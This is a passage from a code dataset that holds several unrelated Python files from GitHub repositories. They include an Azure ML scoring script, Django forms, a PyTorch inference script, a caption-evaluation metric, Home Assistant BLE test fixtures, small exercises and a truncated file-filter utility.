dlen))","repo_name":"Mayer123/NN4NLP-Project","sub_path":"src/InformationRetrieval/SimpleRM/modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":4051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"18695953449","text":"import sys, os\nsys.path.append(os.path.join(os.getcwd(), \"model\"))\n\nimport inception\nimport json\nfrom aml_response import AMLResponse\n\ndef init():\n    global node_lookup\n\n    # Creates graph from saved graph_def.pb.\n    inception.create_graph('model/classify_image_graph_def.pb')\n    node_lookup = inception.NodeLookup('model/imagenet_2012_challenge_label_map_proto.pbtxt',\n                                       'model/imagenet_synset_to_human_label_map.txt')\n\ndef run(request):\n    try:\n        input = request.get_data(False)\n        count = request.args.get('count')\n        \n        if count:\n            res = inception.run_inference_on_image(node_lookup, input, int(count))\n        else:\n            res = inception.run_inference_on_image(node_lookup, input)\n\n        return res\n\n    except Exception as e:\n        return str(e)\n","repo_name":"Azure/AML-AirField","sub_path":"Image/inceptionv3/score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"}
{"seq_id":"26433259630","text":"from django import forms\r\nfrom .models import Event, Comment, Locations\r\nfrom RSO.models import Rso\r\nRATINGS = (\r\n    ('1', '1 Star'),\r\n    ('2', '2 Stars'),\r\n    ('3', '3 Stars'),\r\n    ('4', '4 Stars'),\r\n    ('5', '5 Stars')\r\n)\r\n\r\nclass EventForm(forms.Form):\r\n    name = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Event Name*', 'class': 'text-center text-white', 'id': 'event_name'}), label=\"\", required=True)\r\n    category = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Event Category*', 'class': 'text-center text-white', 'id': 'event_category'}), label=\"\", required=True)\r\n    description = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Describe the event.*', 'class': 
'text-center text-white', 'id': 'event_description'}), label=\"\", required=True)\r\n start_time = forms.TimeField(widget=forms.TimeInput(attrs={'placeholder': '10:00*', 'id': 'event_start*'}), label=\"\", required=True)\r\n end_time = forms.TimeField(widget=forms.TimeInput(attrs={'placeholder': '12:00*', 'id': 'event_end*'}), label=\"\", required=True)\r\n date = forms.DateField(widget=forms.SelectDateWidget(attrs={'class': 'bg-transparent', 'id': 'event_date*'}), label=\"\", required=True)\r\n phone = forms.IntegerField(widget=forms.NumberInput(attrs={'placeholder': '8881239999*', 'id': 'event_phone*', 'class': 'text-center text-white'}), label=\"\", required=True)\r\n email = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'email@realemails.com*', 'id': 'event_email*', 'class': 'text-center text-white'}), label=\"\", required=True)\r\n\r\n # need to add is_RSO , is_private, and so on\r\n def save(self, is_private, is_RSO, location, user_university, user_rso, current_user):\r\n data = self.cleaned_data\r\n current_rso = Rso.objects.filter(id=user_rso.id).first() if user_rso is not None else None\r\n current_event = Event(name = data['name'], \r\n date = data['date'],\r\n start_time = data['start_time'],\r\n category = data['category'],\r\n end_time = data['end_time'],\r\n description = data['description'],\r\n phone = data['phone'],\r\n email = data['email'],\r\n is_public = True if (is_RSO == False and is_private == None) else False,\r\n is_RSO = True if is_RSO else False,\r\n is_private = True if is_private else False,\r\n is_approved = False if is_RSO == False else True,\r\n location = location,\r\n university = user_university,\r\n rso = current_rso if current_rso is not None else None,\r\n admin = current_user)\r\n current_event.save()\r\n\r\n\r\nclass CommentForm(forms.Form):\r\n content = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Comment Here', 'class': 'text-center text-white', 'id': 'create_event_comment'}), label=\"\", required=True)\r\n rating = forms.ChoiceField(choices=RATINGS, label=\"\", required=True)\r\n\r\n def save(self, current_user, current_event):\r\n data = self.cleaned_data\r\n current_comment = Comment(content = data['content'],\r\n rating = data['rating'],\r\n user = current_user,\r\n event = current_event)\r\n current_comment.save()\r\n\r\nclass LocationForm(forms.Form):\r\n location_name = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Location Name*', 'class': 'text-center text-white', 'id': 'location_name'}), label=\"\", required=True)\r\n latitude = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Latitude*', 'class': 'text-center text-white', 'id': 'location_latitude'}), label=\"\", required=True)\r\n longitude = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'Longitude*', 'class': 'text-center text-white', 'id': 'location_longitude'}), label=\"\", required=True)\r\n\r\n def save(self):\r\n data = self.cleaned_data\r\n current_location = Locations(location_name = data['location_name'],\r\n latitude = data['latitude'],\r\n longitude = data['longitude'])\r\n current_location.save()\r\n return current_location","repo_name":"yao1999/College-Event-Website","sub_path":"college_event_website/Events/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":4492,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"35315903312","text":"import os\nimport numpy as np\nimport cv2\nimport torch\nimport torchvision\nfrom model 
import *\nfrom argparse import ArgumentParser\nimport time\n\n\nparser = ArgumentParser()\nparser.add_argument(\"--device\",default=\"cuda:0\", type=str)\nparser.add_argument(\"--input_img\",default=\"1.jpg\", type=str)\nargs = parser.parse_args()\n\nclasses = ['T-shirt/top','Trouser','Pullover','Dress','Coat','Sandal','Shirt','Sneaker','Bag','Ankle Boot']\ndevice=torch.device(args.device)\nbatch_size = 64\nepochs = 10\nlr = 0.00\n\ntransform = torchvision.transforms.Compose([\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Resize(32)\n])\n\nimg = cv2.imread(args.input_img)\nimg = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n\ntensor = transform(img).unsqueeze(0).to(device)\n\n\nmodel = mnistF_classifire()\nmodel = model.to(device)\n\n \nmodel.load_state_dict(torch.load('mnist_Fashion.pth'))\nmodel.eval()\ntic= time.time()\npred = model(tensor)\nelapsed = time.time() - tic\npred = pred.cpu().detach().numpy()\npred = np.argmax(pred)\noutput = classes[pred]\n\nprint(f\"model prediction: {output} \\n inference time= {elapsed}\")\n","repo_name":"ganjbakhshali/Fashion_Mnist_torch","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"16294009466","text":"import torch\nimport os\nimport numpy as np\nimport argparse\nimport pandas as pd\nimport random\nfrom tqdm import tqdm \nimport pickle\nimport spacy\n\n\ndef compute_pragmatic_scores(\n df_path, \n annotations_dir,\n output_path,\n):\n \"\"\"\n Function for computing the contrastivity / pragmatic quality of captions produced\n by a model. The expected input comprises as long dataframe containing\n a column with target IDs, a column with distractor IDs, and a column with \n predicted caption for the target. The function creates a csv reults file with raw\n annotations for each prediction.\n\n Arguments:\n ---------\n df_path: str\n Path to csv file containing target ids, distractor ids, and traget predictions.\n annotations_dir: str\n Path to directory containing the full dataset files.\n output_path: str\n Path where to write output results csv file to.\n \"\"\"\n torch.manual_seed(1234)\n random.seed(1234)\n # check that results file exists\n assert os.path.exists(df_path) or df_path is not None, \"Please provide the results file with the -rf option or check the spelling of the path you provided!\"\n \n # load dependency parser corpus\n try:\n nlp = spacy.load(\"en_core_web_sm\")\n except:\n raise ValueError(\"Dependency parser corpus missing. 
Please install spacy and run 'python -m spacy download en_core_web_sm' \")\n df = pd.read_csv(df_path)\n # check that the columns exist\n assert all([d in df.columns for d in [\"target_id\", \"prediction\", \"distractor_id\"]]), \"The results file must contain the columns target_id, prediction, distractor_id\"\n assert os.path.exists(os.path.join(annotations_dir, \"3dshapes_labels.npy\")), \"Make sure to run the sandbox prediction without the flag load_as_sandbox so as to generate the numeric labels numpy file for the full dataset, or double check file name and location.\"\n\n # load ground truth numeric annotations\n numeric_labels = np.load(os.path.join(annotations_dir, \"3dshapes_labels.npy\"))\n # load terminals for constructing admissible captions\n with open(os.path.join(annotations_dir, \"3dshapes_grammar_terminals.pkl\"), \"rb\") as f:\n feature_terminals = pickle.load(f)\n \n binary_contrasts = []\n contrast_efficiency_scores = []\n relevance_scores = []\n shape_mentions = []\n scale_mentions = []\n shape_color_mentions = []\n wall_color_mentions = []\n orientation_mentions = []\n floor_color_mentions = []\n shape_mentions_c = []\n scale_mentions_c = []\n shape_color_mentions_c = []\n wall_color_mentions_c = []\n orientation_mentions_c = []\n floor_color_mentions_c = []\n num_n_list = []\n num_d_list = []\n num_f_list = []\n num_f_dist_list = []\n shape_color_mentioned = 0\n\n for i, r in tqdm(df.iterrows()):\n # retrieve numeric labels of target and distractor\n target_num_label = numeric_labels[r[\"target_id\"]]\n dist_num_label = numeric_labels[r[\"distractor_id\"]]\n # find features along which they differ (i.e., contrastive features)\n contrastive_features_inds = np.where(target_num_label - dist_num_label != 0)[0].tolist()\n # compute the numer of contrastive descriptions\n num_contrastive_descriptions = len(contrastive_features_inds)\n # construct all appropriate description referring to the contrastive features\n # i.e., correct adjective phrases (n-grams) or unigrams, in case the respective feature (relevant for hue only) is unique (e.g., only the object is blue, \n # then it is assumed to be fine to only say blue, without the noun; but not if e.g. 
the floor is also blue)\n\n # construct all sentences for filtering all mentioned features\n ground_truth_expressions = []\n ground_truth_expressions_dist = []\n target_shape = feature_terminals[\"shape\"][target_num_label[4]][0].split(\" -> \")[-1].replace(\"'\", \"\")\n distractor_shape = feature_terminals[\"shape\"][dist_num_label[4]][0].split(\" -> \")[-1].replace(\"'\", \"\")\n colors_list = [\"red\", \"orange\", \"yellow\", \"green\", \"cyan\", \"blue\", \"purple\", \"pink\"]\n sizes_list = [\"tiny\", \"small\", \"medium\", \"middle sized\", \"big\", \"large\", \"huge\", \"giant\"]\n\n # for ind, name in list(zip(contrastive_features_inds, contrastive_features_names)):\n for ind, name in enumerate(list(feature_terminals.keys())):\n target_val = target_num_label[ind]\n # retrieve annotation\n terminals = feature_terminals[name][target_val]\n nl_expr = terminals[0].split(\" -> \")[-1].replace(\"'\", \"\")\n # get head noun for color\n head_noun = name.split(\"_\")[0]\n if head_noun == \"object\":\n # retrieve NL label for the shape\n head_noun = target_shape\n \n elif head_noun == \"orientation\" or head_noun == \"scale\" or head_noun == \"shape\":\n head_noun = \"\"\n nl_phrase = nl_expr + \" \" + head_noun\n nl_phrase = nl_phrase.strip()\n \n # check if respective value is unique and we can also consider the unigram (specific to colors, the others are unigrams anyways)\n if head_noun != \"orientation\" and target_num_label[:3].tolist().count(target_val) == 1:\n ground_truth_expressions.append(nl_expr)\n else:\n ground_truth_expressions.append(nl_phrase.replace(\"in the \", \"\").replace(\"on the \", \"\"))\n\n # do the same procedure for identifying distractor ground truth expressions for checking if any generated expressions which are false of target\n # are true of distractor\n dist_val = dist_num_label[ind]\n # retrieve annotation\n dist_terminals = feature_terminals[name][dist_val]\n dist_nl_expr = dist_terminals[0].split(\" -> \")[-1].replace(\"'\", \"\")\n # get head noun for color\n dist_head_noun = name.split(\"_\")[0]\n if dist_head_noun == \"object\":\n # retrieve NL label for the shape\n dist_head_noun = distractor_shape\n \n elif dist_head_noun == \"orientation\" or dist_head_noun == \"scale\" or dist_head_noun == \"shape\":\n dist_head_noun = \"\"\n dist_nl_phrase = dist_nl_expr + \" \" + dist_head_noun\n dist_nl_phrase = dist_nl_phrase.strip()\n \n # check if respective value is unique and we can also consider the unigram (specific to colors, the others are unigrams anyways)\n if dist_head_noun != \"orientation\" and dist_num_label[:3].tolist().count(dist_val) == 1:\n ground_truth_expressions_dist.append(dist_nl_expr)\n else:\n ground_truth_expressions_dist.append(dist_nl_phrase.replace(\"in the \", \"\").replace(\"on the \", \"\")) \n \n contrastive_expressions = [ground_truth_expressions[e] for e in contrastive_features_inds]\n \n # compute dependency parse for checking if the shape hue was mentioned (as one phrase)\n dep_parse = nlp(r[\"prediction\"])\n dep_parse_table = pd.DataFrame({\n \"token\": [t.text for t in dep_parse],\n \"tag\": [t.tag_ for t in dep_parse],\n \"head\": [t.head.text for t in dep_parse],\n \"dep\": [t.dep_ for t in dep_parse],\n })\n modifiers = dep_parse_table[(dep_parse_table[\"dep\"] == \"acomp\") | (dep_parse_table[\"dep\"] == \"amod\") | (dep_parse_table[\"dep\"] == \"attr\")][\"token\"].values\n \n # check presence of contrastive expressions in the generated caption\n num_produced_contrasts = 0\n produced_contrasts = []\n 
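shape_color_mentioned = 0  # reset the per-example flag; the assignment before the loop runs only once
        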
produced_contrastive_inds = []\n        for j, e in enumerate(contrastive_expressions):\n            if e in r[\"prediction\"]:\n                num_produced_contrasts += 1\n                produced_contrasts.append(e)\n                produced_contrastive_inds.append(contrastive_features_inds[j])\n                if contrastive_features_inds[j] == 2:\n                    shape_color_mentioned = 1\n            # also check if contrastive features were produced predicatively in case they don't occur literally\n            if e not in produced_contrasts:\n                if e in modifiers:\n                    # check that the modified noun is the correct one\n                    mod_head = dep_parse_table[dep_parse_table[\"token\"] == e][\"head\"].values[0]\n                    # define correct head noun \n                    if contrastive_features_inds[j] == 0:\n                        h_n = \"wall\"\n                    elif contrastive_features_inds[j] == 1:\n                        h_n = \"floor\"\n                    elif contrastive_features_inds[j] in [2, 3, 4]:\n                        h_n = target_shape\n                    else:\n                        h_n = \"orientation\"\n                    \n                    # check whether the head noun is the correct one\n                    # or the head is a verb and the sentence subject is the correct noun\n                    if (mod_head == h_n) or\\\n                    (any([\"VB\" in r for r in dep_parse_table[dep_parse_table[\"token\"] == mod_head][\"tag\"].values]) and\n                    any([r == \"nsubj\" for r in dep_parse_table[dep_parse_table[\"token\"] == h_n][\"dep\"].values]) ):\n                        num_produced_contrasts += 1\n                        produced_contrasts.append(e)\n                        produced_contrastive_inds.append(contrastive_features_inds[j])\n\n        # print(\"Number of produced contrastive exprs \", num_produced_contrasts)\n        num_d_list.append(num_produced_contrasts)\n        \n        # actually record produced discriminative features\n        floor_color_mentions_c.append(1 if 0 in produced_contrastive_inds else 0)\n        wall_color_mentions_c.append(1 if 1 in produced_contrastive_inds else 0)\n        shape_color_mentions_c.append(1 if 2 in produced_contrastive_inds else 0)\n        scale_mentions_c.append(1 if 3 in produced_contrastive_inds else 0)\n        shape_mentions_c.append(1 if 4 in produced_contrastive_inds else 0)\n        orientation_mentions_c.append(1 if 5 in produced_contrastive_inds else 0)\n\n        \n        # retrieve constituents containing nouns (shape, floor, wall, orientation related descriptions)\n        heads_tokens = dep_parse_table[(dep_parse_table[\"tag\"] == \"NN\") | (dep_parse_table[\"tag\"] == \"JJ\")][\"token\"].tolist()\n        \n        heads_tags = dep_parse_table[(dep_parse_table[\"tag\"] == \"NN\") | (dep_parse_table[\"tag\"] == \"JJ\")][\"tag\"].tolist()\n        ngrams = [dep_parse_table[dep_parse_table[\"dep\"] == \"ROOT\"][\"token\"].tolist()[0]] \n        num_false_features = 0\n        false_toks = []\n        false_toks_true_dist = []\n        num_false_toks_true_dist = 0\n        for n in heads_tokens:\n            if n not in [\"picture\", \"front\", \"wall\", \"floor\", \"unk\", \"pad\", \"standing\", \"a\", \"on\", \"in\", \"the\", \"of\"] and n not in \" \".join(ground_truth_expressions):\n                num_false_features += 1\n                false_toks.append(n)\n                if n in \" \".join(ground_truth_expressions_dist):\n                    num_false_toks_true_dist += 1\n                    false_toks_true_dist.append(n)\n        \n        num_f_list.append(num_false_features)\n        num_f_dist_list.append(num_false_toks_true_dist)\n\n        # to account for non-discriminative features, check for each ground truth expression if it occurs in the prediction \n        produced_features = [f for f in ground_truth_expressions if f in r[\"prediction\"]]\n        num_n_list.append(len(produced_features) - num_produced_contrasts)\n        # check occurrences of different features for bias statistics\n        floor_color_mentions.append(1 if any([n + \" floor\" in r[\"prediction\"] for n in colors_list ]) else 0) \n        wall_color_mentions.append(1 if any([n + \" wall\" in r[\"prediction\"] for n in colors_list]) else 0) \n        
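# the remaining mention flags are plain substring checks: orientation against a small keyword list, shape against the literal target shape string, scale against sizes_list\n        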
orientation_mentions.append(1 if any([n in r[\"prediction\"] for n in [\"middle\", \"corner\", \"left\", \"right\"] ]) else 0)\n        shape_mentions.append(1 if any([target_shape in r[\"prediction\"]]) else 0)\n        scale_mentions.append(1 if any([a in r[\"prediction\"] for a in sizes_list]) else 0)\n\n\n        # if no contrastive color was produced, check if it was produced redundantly, either only the adj (if color value unique)\n        # or if it cooccurred with the shape\n        if shape_color_mentioned == 0:\n            target_shape_color = ground_truth_expressions[2]\n            if target_num_label[2] != dist_num_label[2]:\n                shape_color_mentioned = 1 if target_shape_color.split(\" \")[0] in r[\"prediction\"] else 0\n            else:\n                shape_color_mentioned = 1 if ((target_shape_color.split(\" \")[0] in r[\"prediction\"]) and (target_shape in r[\"prediction\"])) else 0\n        \n        shape_color_mentions.append(shape_color_mentioned)\n        binary_contrasts.append(1 if num_produced_contrasts > 0 else 0)\n        if num_contrastive_descriptions == 1:\n            if num_produced_contrasts == 1:\n                contrast_efficiency_scores.append(1)\n            else:\n                contrast_efficiency_scores.append(0)\n        else:\n            contrast_efficiency_scores.append(1 - (num_produced_contrasts-1)/(num_contrastive_descriptions-1) if num_produced_contrasts > 0 else 0)\n\n\n        relevance_scores.append(1-(len(produced_features) - num_produced_contrasts) / (6 - num_contrastive_descriptions))\n\n\n    df_out = pd.DataFrame({\n        \"target_id\": df[\"target_id\"],\n        \"distractor_id\": df[\"distractor_id\"],\n        \"prediction\": df[\"prediction\"],\n        \"binary_contrastiveness\": binary_contrasts,\n        \"contrastive_efficiency\": contrast_efficiency_scores,\n        \"relevance\": relevance_scores,\n        \"is_floor_hue\": floor_color_mentions,\n        \"is_wall_hue\": wall_color_mentions,\n        \"is_object_hue\": shape_color_mentions,\n        \"is_scale\": scale_mentions,\n        \"is_shape\": shape_mentions,\n        \"is_orientation\": orientation_mentions,\n        \"is_floor_hue_disc\": floor_color_mentions_c,\n        \"is_wall_hue_disc\": wall_color_mentions_c,\n        \"is_object_hue_disc\": shape_color_mentions_c,\n        \"is_scale_disc\": scale_mentions_c,\n        \"is_shape_disc\": shape_mentions_c,\n        \"is_orientation_disc\": orientation_mentions_c,\n        \"num_mentioned_features\": np.array(floor_color_mentions) + np.array(wall_color_mentions) + np.array(shape_color_mentions) + np.array(scale_mentions) + np.array(orientation_mentions) + np.array(shape_mentions),\n        \"num_nondiscriminative\": num_n_list,\n        \"num_discriminative\": num_d_list,\n        \"num_false\": num_f_list,\n        \"num_false_true_of_dist\": num_f_dist_list,\n    })\n    df_out.to_csv(output_path)\n\n    # print final statistics to stdout\n    print(\"------------------ Evaluation summary --------------------\")\n    print(\"--- Number of evaluated predictions: \", len(df_out))\n    print(\"--- Average number of features mentioned in each prediction: \", df_out[\"num_mentioned_features\"].mean())\n    print(\"--- Average number of contrastive features mentioned: \" , df_out[\"num_discriminative\"].mean())\n    print(\"--- Average number of non-contrastive features mentioned: \", df_out[\"num_nondiscriminative\"].mean())\n    print(\"--- Average number of false features mentioned: \", df_out[\"num_false\"].mean())\n    print(\"--- Average number of false features true of distractor mentioned: \", df_out[\"num_false_true_of_dist\"].mean())\n    print(\"--- Average discriminativity: \", df_out[\"binary_contrastiveness\"].mean())\n    print(\"--- Average contrastive efficiency: \", df_out[\"contrastive_efficiency\"].mean())\n    print(\"--- Average relevance: \", 
df_out[\"relevance\"].mean())\n print(\"-----------------------------------------------------------\")\n\nif __name__ == \"__main__\":\n # read in cmd args\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"-p\", \"--path\", help = \"path to directory with sandbox and / or full data\", nargs = \"?\", default = \"../sandbox/data\")\n parser.add_argument(\"-rf\", \"--results_file\", help = \"path to file containing predictions and pairs ids to be evaluated\", type = str)\n parser.add_argument(\"-o\", \"--output_path\", help = \"path where to write output results to\", nargs = \"?\", default = \"pragmatic_eval_results.csv\", type = str)\n \n\n args = parser.parse_args()\n\n \n compute_pragmatic_scores(\n df_path=args.results_file, \n annotations_dir=args.path,\n output_path=args.output_path,\n )","repo_name":"polina-tsvilodub/3dshapes-language","sub_path":"pragmatic_evaluation/pragmatic_eval.py","file_name":"pragmatic_eval.py","file_ext":"py","file_size_in_byte":16758,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"74123405634","text":"if __name__ == '__main__':\n # write other type of object\n \"\"\"\n Other types of objects need to be converted \n – either to a string (in text mode) or a bytes object (in binary mode) \n – before writing them:\n \"\"\"\n value = ('the answer', 42)\n s = str(value)\n with open('write_other_type_object.txt', 'w+')as file:\n character_nums = file.write(s)\n print('character_nums: {}'.format(character_nums))\n # f.seek(offset,whence)--To change the file object’s position\n \"\"\"\n offset:the reference point\n whence:\n 0 measures from the beginning of the file, --default value\n 1 uses the current file position, \n output_formatting_1 uses the end of the file as the reference point\n \"\"\"\n print('------------seek--------------')\n with open('seek_file.txt','rb+')as f:\n # read and write\n num=f.write(b'0123456789abcdef')\n print('num: {}'.format(num))\n f.seek(5)\n read_b=f.read(5)\n print('read_b: {}'.format(read_b))\n\n","repo_name":"HolyQuar/git_operation","sub_path":"python_operation/input_output_4/fancier_output_formatting/method_of_file_objects_7.2.py","file_name":"method_of_file_objects_7.2.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20413959605","text":"\"\"\"Tests for the Improv via BLE integration.\"\"\"\n\nfrom improv_ble_client import SERVICE_DATA_UUID, SERVICE_UUID\n\nfrom homeassistant.components.bluetooth import BluetoothServiceInfoBleak\n\nfrom tests.components.bluetooth import generate_advertisement_data, generate_ble_device\n\nIMPROV_BLE_DISCOVERY_INFO = BluetoothServiceInfoBleak(\n name=\"00123456\",\n address=\"AA:BB:CC:DD:EE:F0\",\n rssi=-60,\n manufacturer_data={},\n service_uuids=[SERVICE_UUID],\n service_data={SERVICE_DATA_UUID: b\"\\x01\\x00\\x00\\x00\\x00\\x00\"},\n source=\"local\",\n device=generate_ble_device(address=\"AA:BB:CC:DD:EE:F0\", name=\"00123456\"),\n advertisement=generate_advertisement_data(\n service_uuids=[SERVICE_UUID],\n service_data={SERVICE_DATA_UUID: b\"\\x01\\x00\\x00\\x00\\x00\\x00\"},\n ),\n time=0,\n connectable=True,\n)\n\n\nPROVISIONED_IMPROV_BLE_DISCOVERY_INFO = BluetoothServiceInfoBleak(\n name=\"00123456\",\n address=\"AA:BB:CC:DD:EE:F0\",\n rssi=-60,\n manufacturer_data={},\n service_uuids=[SERVICE_UUID],\n service_data={SERVICE_DATA_UUID: b\"\\x04\\x00\\x00\\x00\\x00\\x00\"},\n source=\"local\",\n 
device=generate_ble_device(address=\"AA:BB:CC:DD:EE:F0\", name=\"00123456\"),\n advertisement=generate_advertisement_data(\n service_uuids=[SERVICE_UUID],\n service_data={SERVICE_DATA_UUID: b\"\\x04\\x00\\x00\\x00\\x00\\x00\"},\n ),\n time=0,\n connectable=True,\n)\n\n\nNOT_IMPROV_BLE_DISCOVERY_INFO = BluetoothServiceInfoBleak(\n name=\"Not\",\n address=\"AA:BB:CC:DD:EE:F2\",\n rssi=-60,\n manufacturer_data={\n 33: b\"\\x00\\x00\\xd1\\xf0b;\\xd8\\x1dE\\xd6\\xba\\xeeL\\xdd]\\xf5\\xb2\\xe9\",\n 21: b\"\\x061\\x00Z\\x8f\\x93\\xb2\\xec\\x85\\x06\\x00i\\x00\\x02\\x02Q\\xed\\x1d\\xf0\",\n },\n service_uuids=[],\n service_data={},\n source=\"local\",\n device=generate_ble_device(address=\"AA:BB:CC:DD:EE:F2\", name=\"Aug\"),\n advertisement=generate_advertisement_data(),\n time=0,\n connectable=True,\n)\n","repo_name":"Clesyde/core-2023.11.1","sub_path":"tests/components/improv_ble/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"140180243","text":"print(\"Welcome to the Love Calculator!\")\nname1 = input(\"What is your name? \\n\")\nname2 = input(\"What is their name? \\n\")\n\nlower_imie1 = name1.lower()\nlower_imie2 = name2.lower()\n\ncount_t = lower_imie1.count(\"t\")\ncount_r = lower_imie1.count(\"r\")\ncount_u = lower_imie1.count(\"u\")\ncount_e1 = lower_imie1.count(\"e\")\ncount_t_2 = lower_imie2.count(\"t\")\ncount_r_2 = lower_imie2.count(\"r\")\ncount_u_2 = lower_imie2.count(\"u\")\ncount_e1_1 = lower_imie2.count(\"e\")\n\ncount_l = lower_imie2.count(\"l\")\ncount_o = lower_imie2.count(\"o\")\ncount_v = lower_imie2.count(\"v\")\ncount_e2 = lower_imie2.count(\"e\")\ncount_l_2 = lower_imie1.count(\"l\")\ncount_o_2 = lower_imie1.count(\"o\")\ncount_v_2 = lower_imie1.count(\"v\")\ncount_e2_2 = lower_imie1.count(\"e\")\n\ntrue_total = count_t + count_r + count_u + count_e1 + count_t_2 + count_r_2 + count_u_2 + count_e1_1\nlove_total = count_l + count_o + count_v + count_e2 + count_l_2 + count_o_2 + count_v_2 + count_e2_2\n\nlove_result = str(true_total) + str(love_total)\nif int(love_result) < 10 or int(love_result) > 90:\n print(f\"Your score is {love_result}, you go together like coke and mentos.\")\nelif int(love_result) >= 40 and int(love_result) <= 50:\n print(f\"Your score is {love_result}, you are alright together.\")\nelse:\n print(f\"Your score is {love_result}.\")","repo_name":"AlanWes/coding_everyday","sub_path":"12.03.23_Love_Calculator.py","file_name":"12.03.23_Love_Calculator.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9063736073","text":"def fatia_max(p, r, v):\n soma_parcial = [v[p]]*len(v[p:r])\n for i in range(p+1,r):\n soma_parcial[i] = soma_parcial[i-1]+v[i]\n soma_max = 0\n for i in range(p+1,r):\n for j in range(p,i):\n soma = soma_parcial[i]-soma_parcial[j]\n if i == p:\n soma_max = soma\n nlin, ncol = j, i\n else:\n if soma_max < soma:\n soma_max = soma\n nlin, ncol = j, i\n return soma_max, nlin, ncol\n\ndef main():\n v = [31, -41, 59, 26, -53, 58, 97, -93, -23, 84]\n print('Teste fatia_max')\n print(fatia_max(0,10,v))\n print()\n print(fatia_max(2,9,v))\n print()\n print(fatia_max(3,9,v))\n print()\n print(fatia_max(7,10,v))\nmain()\n'''\n In [12]:v = [31, -41, 59, 26, -53, 58, 97, -93, -23, 84]\n\n In [13]: fatia_max_meio(0,1,2,v)\n Out[13]: (-10, 0, 2)\n\n In [14]: fatia_max_meio(0,2,3,v)\n Out[14]: (49, 0, 3)\n\n In 
[15]: fatia_max_meio(0,2,4,v)\n Out[15]: (75, 0, 4)\n\n In [16]: fatia_max_meio(0,2,5,v)\n Out[16]: (75, 0, 4)\n\n In [17]: fatia_max_meio(0,2,6,v)\n Out[17]: (80, 0, 6)\n\n In [18]: fatia_max_meio(0,3,6,v)\n Out[18]: (90, 2, 6)\n\n In [19]: fatia_max_meio(0,3,5,v)\n Out[19]: (85, 2, 4)\n\n In [20]: fatia_max_meio(3,5,6,v)\n Out[20]: (31, 3, 6)\n\n In [21]: fatia_max_meio(3,5,7,v)\n Out[21]: (128, 3, 7)\n'''\n\n\n\n","repo_name":"HelloWounderworld/Review-Python","sub_path":"O-que-Fiz-Na-Faculdade/MAC2/EPs-MAC2/EPX2/testes.py","file_name":"testes.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"22022501593","text":"import hashlib\nimport logging\nimport os\nfrom typing import Any, Dict, Optional, Set\n\nlogger = logging.getLogger(__name__)\n\n\nclass DirectoryFileFilter(object):\n \"\"\"A predicate that will return False if / when a proposed file's\n content to-be-written is identical to the contents of the file on\n disk allowing calling code to safely skip the write.\n\n Raises:\n ValueError: directory doesn't exist\n\n >>> testfile = '/tmp/directory_filter_text_f39e5b58-c260-40da-9448-ad1c3b2a69c2.txt'\n >>> contents = b'This is a test'\n >>> with open(testfile, 'wb') as wf:\n ... wf.write(contents)\n 14\n\n >>> d = DirectoryFileFilter('/tmp')\n\n >>> d.apply(contents, testfile) # False if testfile already contains contents\n False\n\n >>> d.apply(b'That was a test', testfile) # True otherwise\n True\n\n >>> os.remove(testfile)\n \"\"\"\n\n def __init__(self, directory: str):\n \"\"\"\n Args:\n directory: the directory we're filtering accesses to\n \"\"\"\n super().__init__()\n from pyutils.files import file_utils\n\n if not file_utils.does_directory_exist(directory):\n raise ValueError(directory)\n self.directory = directory\n self.md5_by_filename: Dict[str, str] = {}\n self.mtime_by_filename: Dict[str, float] = {}\n self._update()\n\n def _update(self):\n \"\"\"\n Internal method. Foreach file in the directory, compute its\n MD5 checksum via :meth:`_update_file`.\n \"\"\"\n for direntry in os.scandir(self.directory):\n if direntry.is_file(follow_symlinks=True):\n mtime = direntry.stat(follow_symlinks=True).st_mtime\n path = f\"{self.directory}/{direntry.name}\"\n self._update_file(path, mtime)\n\n def _update_file(self, filename: str, mtime: Optional[float] = None):\n \"\"\"\n Internal method. 
Given a file and mtime, compute its MD5 checksum\n        and persist it in an internal map.\n        \"\"\"\n        from pyutils.files import file_utils\n\n        assert file_utils.does_file_exist(filename)\n        if mtime is None:\n            mtime = file_utils.get_file_raw_mtime(filename)\n        assert mtime is not None\n        if self.mtime_by_filename.get(filename, 0) != mtime:\n            md5 = file_utils.get_file_md5(filename)\n            logger.debug(\n                \"Computed/stored %s's MD5 at ts=%.2f (%s)\", filename, mtime, md5\n            )\n            self.mtime_by_filename[filename] = mtime\n            self.md5_by_filename[filename] = md5\n\n    def apply(self, proposed_contents: Any, filename: str) -> bool:\n        \"\"\"Call this with the proposed new contents of filename in\n        memory and we'll compute the checksum of those contents and\n        return a value that indicates whether they are identical to\n        the disk contents already (so you can skip the write safely).\n\n        Args:\n            proposed_contents: the 